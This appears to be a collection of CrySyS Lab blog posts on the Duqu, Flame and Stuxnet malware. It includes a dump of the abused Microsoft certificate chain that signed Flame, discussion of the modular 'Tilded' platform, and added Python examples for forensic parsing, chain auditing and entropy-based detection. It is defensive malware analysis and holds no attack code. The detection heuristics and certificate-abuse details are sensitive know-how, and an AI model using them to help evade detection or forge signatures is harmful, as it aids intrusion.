Seems OK, confirmed. Thanks again to Bitdefender for the great job.
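The directory entry dumped above (the two xxd lines at offset 0xd2020) can be decoded by hand to cross-check what istat and fsstat reported. Below is an added example, not code from the original post, that parses that 32-byte FAT short directory entry and checks the recorded size against the 336-sector chain fsstat showed; the sector size of 512 bytes is taken from the post, and the hex bytes are copied from the dump with offsets and ASCII column dropped.

```python
"""Parse the 32-byte FAT directory entry of HUB001.DAT and check it against the FAT chain."""
import struct

# The two xxd lines from the post, offsets and ASCII column removed.
ENTRY_HEX = (
    "4855 4230 3031 2020 4441 5426 0000 0000 "
    "0000 cc40 0000 b9b1 cc40 0300 00a0 0200"
)

ATTR_BITS = [(0x01, "Read-only"), (0x02, "Hidden"), (0x04, "System"),
             (0x08, "Volume label"), (0x10, "Directory"), (0x20, "Archive")]

SECTOR_SIZE = 512  # standard sector size, as stated in the post


def fat_date(raw):
    """FAT date word: bits 15-9 year since 1980, 8-5 month, 4-0 day. 0 means 'not set',
    which The Sleuth Kit shows as the Unix epoch (Thu Jan 1 1970)."""
    if raw == 0:
        return None
    return (1980 + (raw >> 9), (raw >> 5) & 0x0F, raw & 0x1F)


def fat_time(raw):
    """FAT time word: bits 15-11 hour, 10-5 minute, 4-0 two-second units."""
    return (raw >> 11, (raw >> 5) & 0x3F, (raw & 0x1F) * 2)


def parse_dir_entry(entry):
    """Decode a 32-byte FAT short-name directory entry (little-endian fields)."""
    if len(entry) != 32:
        raise ValueError("a FAT directory entry is exactly 32 bytes")
    (name, ext, attr, _nt_res, _crt_tenth, crt_time, crt_date, acc_date,
     clus_hi, wrt_time, wrt_date, clus_lo, size) = struct.unpack("<8s3sBBBHHHHHHHI", entry)
    base = name.decode("ascii").rstrip()
    extension = ext.decode("ascii").rstrip()
    return {
        "name": f"{base}.{extension}" if extension else base,
        "attributes": [label for bit, label in ATTR_BITS if attr & bit],
        "created": fat_date(crt_date),
        "accessed": fat_date(acc_date),
        "written": (fat_date(wrt_date), fat_time(wrt_time)),
        "first_cluster": (clus_hi << 16) | clus_lo,
        "size": size,
    }


def chain_bytes(first_sector, last_sector, sector_size=SECTOR_SIZE):
    """Bytes covered by an inclusive sector run such as fsstat's '1682-2017 (336)'."""
    return (last_sector - first_sector + 1) * sector_size


def size_matches_chain(entry, first_sector, last_sector, sector_size=SECTOR_SIZE):
    """True when the recorded file size fits the allocated run and would not fit one sector less."""
    allocated = chain_bytes(first_sector, last_sector, sector_size)
    return allocated - sector_size < entry["size"] <= allocated


if __name__ == "__main__":
    e = parse_dir_entry(bytes.fromhex(ENTRY_HEX.replace(" ", "")))
    for k, v in e.items():
        print(f"{k}: {v}")
    print("size matches FAT chain 1682-2017:", size_matches_chain(e, 1682, 2017))
```

Running it recovers the same facts the post got from istat: name HUB001.DAT, attributes Hidden, System, Archive, written Tue Jun 12 22:13:50 2012, a zero (never set) creation date, and a size of 172032 bytes, which is exactly the 336 sectors fsstat listed.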


Stuxnet-Duqu-Flame open source license questions v0

Dear All,
As you know, the recent nation-sponsored attacks used a bunch of libraries. However, nobody has investigated the license terms yet. Here is a short list; based on your feedback we might update this article.

Duqu:

modified LZO for .zdata: LZO and the LZO algorithms and implementations are distributed under the terms of the GNU General Public License (GPL).

Flame:

PuTTY – MIT license
libbz2 – BSD-style license
zlib – very permissive license http://www.gzip.org/zlib/zlib_license.html
SQLite – public domain
Lua – MIT license

As we are at the end of a long, long day of serious problems, let’s go for a nice and easy point.

So our question is: please, dear authors of Duqu (whoever they are), hand over the source code of Duqu (or Beacon/NYT), as it contains GPL code.

The source code can be sent to duqusubmit@crysys.hu.
Discussion on the topic is highly welcome.

Thank you for your attention.
b.

Disclaimer: This post is for fun, don’t take it too seriously, but the questions are still valid. This post is a personal post of one of the Lab members and does not reflect the view of any organization.


The Flame malware WuSetupV.exe certificate chain

First of all, be sure to read our tech report on the Flame/Flamer/TheFlame/sKyWIper malware.

As you already know, some Microsoft certificates were abused for the Flame malware’s MITM installation method.
But take a look at the technical details of the certificate chain.

The actual code is signed by a series of certificates:

One interesting thing is that the program file was timestamped, too:

OK, let’s see the certificates from top to bottom:

Certificate:
Data:
Version: 3 (0x2)
Serial Number:
c1:00:8b:3c:3c:88:11:d1:3e:f6:63:ec:df:40
Signature Algorithm: md5WithRSAEncryption
Issuer: OU=Copyright (c) 1997 Microsoft Corp., OU=Microsoft Corporation, CN=Microsoft Root Authority
Validity
Not Before: Jan 10 07:00:00 1997 GMT
Not After : Dec 31 07:00:00 2020 GMT
Subject: OU=Copyright (c) 1997 Microsoft Corp., OU=Microsoft Corporation, CN=Microsoft Root Authority
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Exponent: 65537 (0x10001)
X509v3 extensions:
2.5.29.1:
0....[.p.ir.#Q~..M....r0p1+0)..U..."Copyright (c) 1997 Microsoft Corp.1.0...U....Microsoft Corporation1!0...U....Microsoft Root Authority......<<...>.c..@
Signature Algorithm: md5WithRSAEncryption

Next level (2):

Certificate:
Data:
Version: 3 (0x2)
Serial Number:
3a:ab:11:de:e5:2f:1b:19:d0:56
Signature Algorithm: md5WithRSAEncryption
Issuer: OU=Copyright (c) 1997 Microsoft Corp., OU=Microsoft Corporation, CN=Microsoft Root Authority
Validity
Not Before: Dec 10 01:55:35 2009 GMT
Not After : Oct 23 08:00:00 2016 GMT
Subject: C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Copyright (c) 1999 Microsoft Corp., CN=Microsoft Enforced Licensing Intermediate PCA
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Extended Key Usage:
Code Signing, 1.3.6.1.4.1.311.10.6.1, 1.3.6.1.4.1.311.10.6.2
2.5.29.1:
0....[.p.ir.#Q~..M....r0p1+0)..U..."Copyright (c) 1997 Microsoft Corp.1.0...U....Microsoft Corporation1!0...U....Microsoft Root Authority......<<...>.c..@
X509v3 Basic Constraints: critical
CA:TRUE
X509v3 Subject Key Identifier:
6A:97:E0:C8:9F:F4:49:B4:89:24:B3:E3:D1:A8:22:86:AA:D4:94:43
X509v3 Key Usage:
Digital Signature, Certificate Sign, CRL Sign
Signature Algorithm: md5WithRSAEncryption

Level 3:

Certificate:
Data:
Version: 3 (0x2)
Serial Number:
61:1a:02:b7:00:02:00:00:00:12
Signature Algorithm: md5WithRSAEncryption
Issuer: C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Copyright (c) 1999 Microsoft Corp., CN=Microsoft Enforced Licensing Intermediate PCA
Validity
Not Before: Dec 11 00:03:58 2009 GMT
Not After : Oct 23 08:00:00 2016 GMT
Subject: C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Copyright (c) 2003 Microsoft Corp., CN=Microsoft Enforced Licensing Registration Authority CA
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Basic Constraints: critical
CA:TRUE
X509v3 Subject Key Identifier:
B4:A1:D8:DE:FB:0E:C4:CB:9D:9F:06:CF:36:0D:91:1A:F8:9F:5B:E3
X509v3 Key Usage:
Digital Signature, Non Repudiation, Certificate Sign, CRL Sign
1.3.6.1.4.1.311.21.1:
.....
1.3.6.1.4.1.311.21.2:
....x8g.).k/.T..p_....
1.3.6.1.4.1.311.20.2:
.
.S.u.b.C.A
X509v3 Authority Key Identifier:
keyid:6A:97:E0:C8:9F:F4:49:B4:89:24:B3:E3:D1:A8:22:86:AA:D4:94:43
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl.microsoft.com/pki/crl/products/MicEnfLicPCA_12-10-09.crl
X509v3 Extended Key Usage:
Code Signing, 1.3.6.1.4.1.311.10.6.2
1.3.6.1.4.1.311.2.1.10: critical
0....).'https://www.microsoft.com/repository/CPS........This certificate incorporates by reference, and its use is strictly

subject to, the Microsoft Certification Practice Statement (CPS)
version 2.0, available in the Microsoft repository at:
https://www.microsoft.com; by E-mail at CPS-requests@microsoft.com; or
by mail at Microsoft Corp, dept. CPS,1 Microsoft Way,Redmond, WA 98052
USA Copyright (c)1999 Microsoft Corp. All Rights Reserved. CERTAIN
WARRANTIES DISCLAIMED AND LIABILITY LIMITED.

WARNING: THE USE OF THIS CERTIFICATE IS STRICTLY SUBJECT TO THE
VERISIGN CERTIFICATION PRACTICE STATEMENT. THE ISSUING AUTHORITY
DISCLAIMS CERTAIN IMPLIED AND EXPRESS WARRANTIES, INCLUDING WARRANTIES
OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE, AND WILL NOT
BE LIABLE FOR CONSEQUENTIAL, PUNITIVE, AND CERTAIN OTHER DAMAGES. SEE
THE CPS FOR DETAILS.

Contents of the Microsoft registered nonverifiedSubjectAttributes
extension value shall not be considered as accurate information
validated by the IA.
.6.4https://www.microsoft.com/repository/mscpslogo.gif
Signature Algorithm: md5WithRSAEncryption

Level 4:

Certificate:
Data:
Version: 3 (0x2)
Serial Number:
61:03:73:c5:00:01:00:00:00:1a
Signature Algorithm: md5WithRSAEncryption
Issuer: C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Copyright (c) 2003 Microsoft Corp., CN=Microsoft Enforced Licensing Registration Authority CA
Validity
Not Before: Feb 19 21:48:39 2010 GMT
Not After : Feb 19 21:48:39 2012 GMT
Subject: DC=com, DC=microsoft, DC=extranet, DC=partners, CN=Microsoft LSRA PA
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Basic Constraints: critical
CA:TRUE, pathlen:0
X509v3 Subject Key Identifier:
75:E8:03:58:5D:FB:65:E4:D9:A6:AC:17:B6:03:7E:47:AD:2E:81:AF
X509v3 Key Usage:
Digital Signature, Certificate Sign, CRL Sign
1.3.6.1.4.1.311.21.1:
...
1.3.6.1.4.1.311.20.2:
.
.S.u.b.C.A
X509v3 Authority Key Identifier:
keyid:B4:A1:D8:DE:FB:0E:C4:CB:9D:9F:06:CF:36:0D:91:1A:F8:9F:5B:E3
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl.microsoft.com/pki/crl/products/MicEnfLicRegAutCA_2009-12-10.crl
URI:http://www.microsoft.com/pki/crl/products/MicEnfLicRegAutCA_2009-12-10.crl
Authority Information Access:
CA Issuers - URI:http://www.microsoft.com/pki/certs/MicEnfLicRegAutCA_2009-12-10.crt
Signature Algorithm: md5WithRSAEncryption

And the final step:

Certificate:
Data:
Version: 3 (0x2)
Serial Number: 7038 (0x1b7e)
Signature Algorithm: md5WithRSAEncryption
Issuer: DC=com, DC=microsoft, DC=extranet, DC=partners, CN=Microsoft LSRA PA
Validity
Not Before: Feb 19 21:48:39 2010 GMT
Not After : Feb 19 21:48:39 2012 GMT
Subject: CN=MS
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit)
Exponent: 65537 (0x10001)
Signature Algorithm: md5WithRSAEncryption

So from the advisory at http://technet.microsoft.com/en-us/security/advisory/2718704 we know that

  • Microsoft Enforced Licensing Intermediate PCA (2 certificates)
  • Microsoft Enforced Licensing Registration Authority CA (SHA1)

were revoked.

The exact list can be found at http://blogs.technet.com/b/srd/ as follows:

Certificate | Issued by | Thumbprint
Microsoft Enforced Licensing Intermediate PCA | Microsoft Root Authority | 2a 83 e9 02 05 91 a5 5f c6 dd ad 3f b1 02 79 4c 52 b2 4e 70
Microsoft Enforced Licensing Intermediate PCA | Microsoft Root Authority | 3a 85 00 44 d8 a1 95 cd 40 1a 68 0c 01 2c b0 a3 b5 f8 dc 08
Microsoft Enforced Licensing Registration Authority CA (SHA1) | Microsoft Root Certificate Authority | fa 66 60 a9 4a b4 5f 6a 88 c0 d7 87 4d 89 a8 63 d7 4d ee 97

For the certificate chain above, the Level 2 certificate is the one referred to in row 1 of the table above. The other two certificates might have been revoked as a precaution.
level 3.
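The properties the post walks through (every level signed with md5WithRSAEncryption, the validity windows, the pathlen:0 constraint on Level 4, and the names in the advisory table) can be checked mechanically. The script below is an added example, not code from the post or from CrySyS Lab: it reads abbreviated `openssl x509 -text` blocks (the constructed sample carries the five certificates above, trimmed to the fields it reads), and the check date, the weak-digest list and the name-based revocation match are assumptions of this example.

```python
import re
from datetime import datetime

# Collision-prone digests: MD5 signs every level above; SHA-1 added for present-day use.
WEAK_SIG_ALGS = {"md5WithRSAEncryption", "sha1WithRSAEncryption"}
# CNs from the Advisory 2718704 table above (name match only; real checks use thumbprints).
REVOKED_CNS = {"Microsoft Enforced Licensing Intermediate PCA",
               "Microsoft Enforced Licensing Registration Authority CA"}
# Constructed sample: the five dumps above, root first, trimmed to the fields read here.
CHAIN_DUMP = """\
Certificate:
Signature Algorithm: md5WithRSAEncryption
Issuer: OU=Copyright (c) 1997 Microsoft Corp., OU=Microsoft Corporation, CN=Microsoft Root Authority
Not Before: Jan 10 07:00:00 1997 GMT
Not After : Dec 31 07:00:00 2020 GMT
Subject: OU=Copyright (c) 1997 Microsoft Corp., OU=Microsoft Corporation, CN=Microsoft Root Authority
Certificate:
Signature Algorithm: md5WithRSAEncryption
Issuer: OU=Copyright (c) 1997 Microsoft Corp., OU=Microsoft Corporation, CN=Microsoft Root Authority
Not Before: Dec 10 01:55:35 2009 GMT
Not After : Oct 23 08:00:00 2016 GMT
Subject: C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Copyright (c) 1999 Microsoft Corp., CN=Microsoft Enforced Licensing Intermediate PCA
CA:TRUE
Certificate:
Signature Algorithm: md5WithRSAEncryption
Issuer: C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Copyright (c) 1999 Microsoft Corp., CN=Microsoft Enforced Licensing Intermediate PCA
Not Before: Dec 11 00:03:58 2009 GMT
Not After : Oct 23 08:00:00 2016 GMT
Subject: C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Copyright (c) 2003 Microsoft Corp., CN=Microsoft Enforced Licensing Registration Authority CA
CA:TRUE
Certificate:
Signature Algorithm: md5WithRSAEncryption
Issuer: C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Copyright (c) 2003 Microsoft Corp., CN=Microsoft Enforced Licensing Registration Authority CA
Not Before: Feb 19 21:48:39 2010 GMT
Not After : Feb 19 21:48:39 2012 GMT
Subject: DC=com, DC=microsoft, DC=extranet, DC=partners, CN=Microsoft LSRA PA
CA:TRUE, pathlen:0
Certificate:
Signature Algorithm: md5WithRSAEncryption
Issuer: DC=com, DC=microsoft, DC=extranet, DC=partners, CN=Microsoft LSRA PA
Not Before: Feb 19 21:48:39 2010 GMT
Not After : Feb 19 21:48:39 2012 GMT
Subject: CN=MS
"""

def parse_cert(text):
    """Pull the fields the audit needs out of one `openssl x509 -text` block."""
    field = lambda rx: (re.search(rx, text, re.M) or [None, None])[1]
    date = lambda s: s and datetime.strptime(" ".join(s.split()), "%b %d %H:%M:%S %Y %Z")
    bc = re.search(r"CA:(TRUE|FALSE)(?:, pathlen:(\d+))?", text)
    return {"sig_alg": field(r"Signature Algorithm:\s*(\S+)"), "is_ca": bool(bc and bc[1] == "TRUE"),
            "issuer": field(r"^\s*Issuer:\s*(.+?)\s*$"), "subject": field(r"^\s*Subject:\s*(.+?)\s*$"),
            "not_before": date(field(r"Not Before:\s*(.+?)\s*$")),
            "not_after": date(field(r"Not After\s*:\s*(.+?)\s*$")),
            "pathlen": int(bc[2]) if bc and bc[2] else None}

def audit_chain(dump, check_date):
    """Return [(level, finding)] for a root-first chain dump at check_date 'YYYY-MM-DD'; level 1 is the anchor."""
    at = datetime.strptime(check_date, "%Y-%m-%d")
    certs = [parse_cert(b) for b in re.split(r"^Certificate:$", dump, flags=re.M) if b.strip()]
    findings = []
    for i, c in enumerate(certs, 1):
        if c["sig_alg"] in WEAK_SIG_ALGS:
            findings.append((i, "weak signature: " + c["sig_alg"]))
        # A timestamped Authenticode signature (this file was) still verifies after expiry: a note, not a verdict.
        if not c["not_before"] <= at <= c["not_after"]:
            findings.append((i, "not valid at " + check_date))
        if i > 1 and c["issuer"] != certs[i - 2]["subject"]:
            findings.append((i, "issuer does not match level %d subject" % (i - 1)))
        if c["pathlen"] is not None and sum(d["is_ca"] for d in certs[i:]) > c["pathlen"]:
            findings.append((i, "pathlen:%d exceeded" % c["pathlen"]))
        if (re.search(r"CN=([^,]+)", c["subject"]) or [None, None])[1] in REVOKED_CNS:
            findings.append((i, "name listed in the Advisory 2718704 table"))
    return findings
```

Against a real chain, feed it the `openssl x509 -text -noout` output of each level, root first; on the sample, levels 4 and 5 are already expired at a June 2012 check date, which is why the timestamp the post mentions matters for the signature.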

Duqu=Stuxnet=Stars=Tilded and it is a lego-kit

Let me answer Takashi Toyota here. This blog post may be corrected/edited later without notice.

The question was:

@CrySySLab @mikko Thank you for the info. “They” have a dev platform called #tilded, don’t they? From there many instances coming out!

In fact, this is an answer to our tweets “Duqu=Stars=Stuxnet (= #tilded) Duqu is an info stealing instance, Stuxnet is a PLC modifying, self-replicating instance.” and “Don’t think of Duqu as a traditional malware. It’s just a version of an info stealing instance of the #tilded platform.”

So the short answer is yes: Tilded-Duqu-Stuxnet-Stars is a development platform for building the right individual malware instance for the actual duty and the actual target.

For the second part the answer is: it depends on the industry whether “many instances will come out”. Our CrySyS Duqu detector is the tool that is the first step to stop the threat at all, and as such it is a groundbreaking (tilded-breaking) tool. However, this is just a first step, not a final solution!

Let me explain.

  1. Why is Duqu=Stuxnet?

When we started our investigations we saw raw binary code and had only partial, local information. In recent months we discussed a lot and read many interesting news items, the most interesting pieces coming from Symantec and Kaspersky (and others as well). When we published our report, we were not sure what the real target was, or whether the code was really based on the source code of Stuxnet. Now we are confident that the goals of Duqu are most likely highly related to Stuxnet’s goals and that most likely the same developers are behind the code.

Moreover, we really believe that Duqu is not a separate project from the Stuxnet/Tilded/Duqu/Stars team, but an integrated part of a workflow. And this workflow does not produce strains or pieces of malware; it produces modules and compiles “instances” for a particular target and a particular goal.

They have kernel drivers, exploits, keyloggers and infostealers (~DN1), file packers as in Stars, PLC modules as in Stuxnet, an RPC module, injectors, rootkit stuff, and maybe lots of other modules. Most of them are easy to modify or parametrize, and easy to make cooperate (compile in, download, etc.) with other modules.

As such, yes, it is a platform. It is not a development platform in the sense of an API, but a bunch of modules in different versions and modifications. Most likely it is not based on a versioning tool such as SVN, where you just check out the latest version; it is more about the target, the goals and the ideas. Maybe sometimes they revert to an old version, as in ‘oh, in that case that idea/modification was great and it fits the current target’, and such.

So we fully agree now: Duqu is not an individual malware, but part of a long story, and we also proposed not to call the individual parts by name (Stuxnet, Duqu, Stars – SDS); rather, we should name the platform somehow. Maybe tilded is the right word, maybe not, but calling them by individual names can be misleading.

  2. War of definitions and names

Duqu was called a RAT, Remote Access Trojan. However, it is not a trojan, as it does not claim to do something good. It is installed through a 0-day Windows exploit, so I would not call it a trojan. It is not a virus either. It does not self-replicate, so still, malware is the best word.

Moreover, it contains a rootkit, as it loads a driver during Windows startup. But its goal is not to be a backdoor, or at least that is not its only goal. That is true, but it does not infect computers all the time; it can run its info-stealing component on some targets without infection. Then again – is Duqu a simple keylogger/infostealer? No, it’s more.

So Duqu is not a rootkit; the rootkit part is just a tool. The info-stealing component is not active all the time; moreover, it is not even included in all Duqu infections at the first step, it is just downloaded from the C&C servers. Okay, then is Duqu a malicious communication protocol? No; it can be, but it is also possible to use RPC to communicate with others without direct communication to the C&C server.

Why was it so important to discuss this? To see that Duqu as a whole cannot be put in any normal category of malware. And the reason is that “Duqu as a whole” simply does not exist! It is a lego-kit of modules, and you can only define the goal of the individual modules, not of the kit as a whole.

(So we totally agree with the definition of Duqu (Tilded) as a lego-kit recently given by Kaspersky; we already used the term in our short 5-minute presentation in November at the Cyber-Security conference at ZMNE, Budapest.)

  3. Why won’t additional instances come out in the near future?

When we identified that Duqu is so closely related to Stuxnet, the most basic question was: why did antivirus tools fail to identify Duqu? You can extend the question: how is it possible that no one identified Stuxnet and Duqu for such a long time? How is it possible that so many different types existed and they were recognized only recently?

We want to work on this topic, but some preliminary remarks:

- There is a reason why the code of the parts of “Tilded” is so close across instances: efficiency, not rewriting everything multiple times. And more interestingly: “Tilded” is a special kind of malware in that the code is tested thoroughly and contains a lot of careful error handling. Do you want to completely rewrite the code? Then you have to restart the testing procedures as well. Nobody likes to waste time, therefore the basics remained the same for all the code produced by the team, where possible.

Simple changes were necessary and sufficient to avoid identification of new instances by antivirus products, and these small changes (e.g. in the crypto code) were easy to test.

So why do we say that it is unlikely that the team will come out with new instances in the near future? Because if they do not change the basic characteristics, these new versions will be vulnerable to detection by tools such as our Duqu Detector Toolkit (which will later be renamed to something more general).

We built our detector toolkit on the basics of how the Tilded/Duqu/Stuxnet tools work. Our tool does not only detect the driver by signature-based techniques; it also detects the info stealer’s temporary files, any PNF files in the windows/inf directory that have more entropy than expected, etc.

All in all, our Duqu detector toolkit makes it possible to detect ALL the different versions of the Tilded platform (Duqu, Stuxnet, who knows what) to some extent. I would not say that it will detect all the possible pieces of information, files or registry settings, but most likely our tool is able to pinpoint problems in a network, whether it be 10 computers or 10,000. Again, not just Duqu, not just Stuxnet, but any intermediate instance might have signs that the detector can identify.
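One of the heuristics named above, the entropy check over PNF files in the inf directory, as an added example (not the Lab’s Duqu Detector Toolkit code): the 7.0 bits/byte threshold, the file names and the sample contents are assumptions constructed for this illustration.

```python
import math
import os
import random
from collections import Counter

# Assumed threshold for this example: encrypted or compressed payloads approach
# 8 bits/byte, while precompiled INF (PNF) data, full of UTF-16 strings and
# zero padding, stays well below that.
ENTROPY_THRESHOLD = 7.0
INF_DIR = r"C:\Windows\inf"  # the directory the post names; adjust per host

def shannon_entropy(data):
    """Shannon entropy of `data` in bits per byte (0.0 for empty input)."""
    n = len(data)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def flag_high_entropy(files, threshold=ENTROPY_THRESHOLD):
    """Return sorted [(name, entropy)] for .pnf entries above `threshold`.

    `files` maps a file name to its content bytes, so the logic runs without a disk."""
    hits = [(name, round(shannon_entropy(data), 2))
            for name, data in files.items() if name.lower().endswith(".pnf")]
    return sorted((name, h) for name, h in hits if h > threshold)

def scan_pnf_dir(path=INF_DIR, threshold=ENTROPY_THRESHOLD):
    """Read every .pnf file in `path` and return the high-entropy ones."""
    files = {}
    for entry in os.scandir(path):
        if entry.is_file() and entry.name.lower().endswith(".pnf"):
            with open(entry.path, "rb") as fh:
                files[entry.name] = fh.read()
    return flag_high_entropy(files, threshold)

# Constructed samples, not real files: INF text as UTF-16LE stands in for a normal
# PNF; a seeded PRNG stream stands in for an encrypted payload (repeatable run).
_rng = random.Random(2011)
BENIGN_PNF = ('[Version]\r\nSignature="$Windows NT$"\r\n' * 40).encode("utf-16-le")
SUSPECT_PNF = bytes(_rng.getrandbits(8) for _ in range(4096))
SAMPLE_INF_DIR = {"sample_a.PNF": BENIGN_PNF, "sample_b.PNF": SUSPECT_PNF,
                  "sample_c.inf": SUSPECT_PNF}  # not .pnf, so never flagged

if __name__ == "__main__":
    for name, h in flag_high_entropy(SAMPLE_INF_DIR):
        print("%s: %.2f bits/byte" % (name, h))
```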

And it’s not just our tool. Several researchers have made new tools that are not based on raw signatures but on some kind of heuristics. Check Bro, check Metasploit, check A/V vendors’ tools, and others; you cannot even easily collect all the ways in which people now check for anomalies of the platform.

This is the reason why simple modifications to the malware platform no longer work. They need a complete rewrite of the code to avoid rapid identification, or the story vanishes in time. Who knows what will come.

I should again thank Kaspersky and Symantec for the collaboration on the topic.

Boldi

Editorial note

Blog entries of the Lab are a rapid way of communication. Entries have not gone through the regular quality check processes and might contain errors. We modify blog entries if necessary without prior notice. The blog post is a personal disclosure and does not reflect institutional opinion.